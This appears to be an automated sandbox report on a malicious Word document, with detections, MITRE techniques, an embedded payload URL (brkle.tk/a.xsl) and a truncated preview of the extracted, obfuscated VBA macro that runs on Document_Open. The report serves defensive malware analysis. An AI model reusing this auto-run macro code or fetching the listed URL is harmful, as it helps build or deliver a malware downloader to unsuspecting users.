Verdict: MALICIOUS
Risk Score: 330

Malware Insights

MITRE ATT&CK:
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
The sample is a malicious Office document containing VBA macros that run from the Auto_Open and Document_Open events. The document body explicitly prompts the user to 'Enable Content' for compatibility, a common social engineering tactic. The VBA script checks whether any .txt files exist in the AppData directory and, if none are found, calls a further routine, likely to download and execute a second-stage payload.
Heuristics (9)
- ClamAV: Doc.Downloader.Shellhide-10014935-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Shellhide-10014935-0
- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings): document contains a VBA project; VBA macros present
- Document_Open macro (high, OLE_VBA_DOCOPEN)
- Auto_Open macro (high, OLE_VBA_AUTO)
- CreateObject call (high, OLE_VBA_CREATEOBJ)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call, env variable access (low, OLE_VBA_ENVIRON)
- Macro/content-enable lure (medium, SE_ENABLE_LURE): document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
- http://brkle.tk/a.xsl (in document text: OOXML body / shared strings)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

- macros.bas
  - Kind: vba-macro
  - Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  - Size: 16278 bytes
  - SHA-256: b370c3c95f5b526c9b39e0cec2dd56e9f5adfbe8d609ef11fba914eff766f549
Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim bSaved As Boolean
Sub Auto_Open()
End Sub
Sub Document_Open()
    Call fkeSzYxLrhuhRVGJiwLwclRuspXnlHOkQQLvdcrjtqRkljfeKddNqdpozjZuwoUXQTwyaJjHdtqbrQiCiKdMYCURXR
    Call iMZhgBKouwiXWuJfNJrPlTeEoJuEzwqyPBCPQEIBAFXCgDJNjOTIHLZnRjcQHbIYKrywncYhINIWBCdppvoJFcEBiv
    If Len(Dir(Environ("AppData") + "\*.txt")) = 0 Then
        RuIXdbXbZrJsLewgrkgkIVJlqRVKVZvwCjPAVVDFYJsmnbu
    Else
    End If
End Sub
Sub fkeSzYxLrhuhRVGJiwLwclRuspXnlHOkQQLvdcrjtqRkljfeKddNqdpozjZuwoUXQTwyaJjHdtqbrQiCiKdMYCURXR()
    Dim rMuPCvUeYbzWcTGSAJfyQegypxAsPyzBljKGrAxQrjVDlWnkVpKMXaKMGvQ As String, XsinaEJSOxrwGdNlmgQAVikPuZ As String
    Dim MqcLQkajnWyncygEwxmlvnugETdDhGRbCUMtLTIPpgapdGoLLvUlbmIzLPJtYgVWZqYtuuG As Range, SzCrtxZGklYuUudTGEpMLEDzFUubZZaHjnNvaeevieVqBsoHtyNddgTnHoXBHfSxkBmmOMrkUDckiEeWHyYwolRYmyBdZo As Range
    Dim voXvGkYUJt As Range, GfqdEWWQCHtDtXsaiNNWiHxOXTeECFctzEtNwlxHZqIFfoLYnxgYZbRoyVib As Range, KBFXvyAmJHAbTMMVeMOOnfxWtYtRRuDvxPUdSuekIQCJHXZDApHGdlP As Range
    'Setting up the Ranges
    Set MqcLQkajnWyncygEwxmlvnugETdDhGRbCUMtLTIPpgapdGoLLvUlbmIzLPJtYgVWZqYtuuG = ActiveDocument.Range
    Set SzCrtxZGklYuUudTGEpMLEDzFUubZZaHjnNvaeevieVqBsoHtyNddgTnHoXBHfSxkBmmOMrkUDckiEeWHyYwolRYmyBdZo = ActiveDocument.Range
    Set voXvGkYUJt = ActiveDocument.Range
    ActiveDocument.ActiveWindow.View.DisplayBackgrounds = True
    ActiveDocument.Background.Fill.ForeColor.RGB = RGB(225, 225, 225)
    ActiveDocument.Background.Fill.Transparency = 0#
    'Set your Start and End Find words here to cleanup the script
    rMuPCvUeYbzWcTGSAJfyQegypxAsPyzBljKGrAxQrjVDlWnkVpKMXaKMGvQ = "This Document Is"
    XsinaEJSOxrwGdNlmgQAVikPuZ = "Version."
    'Starting the Find First Word
    With MqcLQkajnWyncygEwxmlvnugETdDhGRbCUMtLTIPpgapdGoLLvUlbmIzLPJtYgVWZqYtuuG.Find
        .Text = rMuPCvUeYbzWcTGSAJfyQegypxAsPyzBljKGrAxQrjVDlWnkVpKMXaKMGvQ
        .Replacement.Text = ""
        .Forward = True
        .Wrap = wdFindAsk
        .Format = True
        .MatchCase = False
        .MatchWholeWord = False
        .MatchWildcards = False
        .MatchSoundsLike = False
        .MatchAllWordForms = False
        'Execute the Find
        Do While .Execute
            'If Found then do extra script
            If .Found = True Then
                'Setting the Found range to the GfqdEWWQCHtDtXsaiNNWiHxOXTeECFctzEtNwlxHZqIFfoLYnxgYZbRoyVib
                Set GfqdEWWQCHtDtXsaiNNWiHxOXTeECFctzEtNwlxHZqIFfoLYnxgYZbRoyVib = MqcLQkajnWyncygEwxmlvnugETdDhGRbCUMtLTIPpgapdGoLLvUlbmIzLPJtYgVWZqYtuuG
                'Having these Selections during testing is benificial to test your script
                GfqdEWWQCHtDtXsaiNNWiHxOXTeECFctzEtNwlxHZqIFfoLYnxgYZbRoyVib.Select
                'Setting the SzCrtxZGklYuUudTGEpMLEDzFUubZZaHjnNvaeevieVqBsoHtyNddgTnHoXBHfSxkBmmOMrkUDckiEeWHyYwolRYmyBdZo up for the remainder of the document form the end of the rMuPCvUeYbzWcTGSAJfyQegypxAsPyzBljKGrAxQrjVDlWnkVpKMXaKMGvQ
                SzCrtxZGklYuUudTGEpMLEDzFUubZZaHjnNvaeevieVqBsoHtyNddgTnHoXBHfSxkBmmOMrkUDckiEeWHyYwolRYmyBdZo.Start = GfqdEWWQCHtDtXsaiNNWiHxOXTeECFctzEtNwlxHZqIFfoLYnxgYZbRoyVib.End
                SzCrtxZGklYuUudTGEpMLEDzFUubZZaHjnNvaeevieVqBsoHtyNddgTnHoXBHfSxkBmmOMrkUDckiEeWHyYwolRYmyBdZo.End = ActiveDocument.Content.End
                'Having these Selections during testing is benificial to test your script
                SzCrtxZGklYuUudTGEpMLEDzFUubZZaHjnNvaeevieVqBsoHtyNddgTnHoXBHfSxkBmmOMrkUDckiEeWHyYwolRYmyBdZo.Select
                'Setting the Find to look for the End Word
                With SzCrtxZGklYuUudTGEpMLEDzFUubZZaHjnNvaeevieVqBsoHtyNddgTnHoXBHfSxkBmmOMrkUDckiEeWHyYwolRYmyBdZo.Find
                    .Text = XsinaEJSOxrwGdNlmgQAVikPuZ
                    .Execute
                    'If Found then do extra script
                    If .Found = True Then
                        'Setting the Found range to the KBFXvyAmJHAbTMMVeMOOnfxWtYtRRuDvxPUdSuekIQCJHXZDApHGdlP
                        Set KBFXvyAmJHAbTMMVeMOOnfxWtYtRRuDvxPUdSuekIQCJHXZDApHGdlP = SzCrtxZGklYuUudTGEpMLEDzFUubZZaHjnNvaeevieVqBsoHtyNddgTnHoXBHfSxkBmmOMrkUDckiEeWHyYwolRYmyBdZo
                        'Having these Selections during testing is benificial to test your script
                        KBFXvyAmJHAb
```

... (preview truncated)
- vbaProject_00.bin
  - Kind: vba-project
  - Source: OOXML VBA project: word/vbaProject.bin
  - Size: 151552 bytes
  - SHA-256: 46680dba1e04870aa832c6a4e2eb2ce0c6b9ab2b22634848f5a39fb9901117c3
Detection
- ClamAV: Doc.Downloader.Shellhide-10014935-0
- Obfuscation or payload: unlikely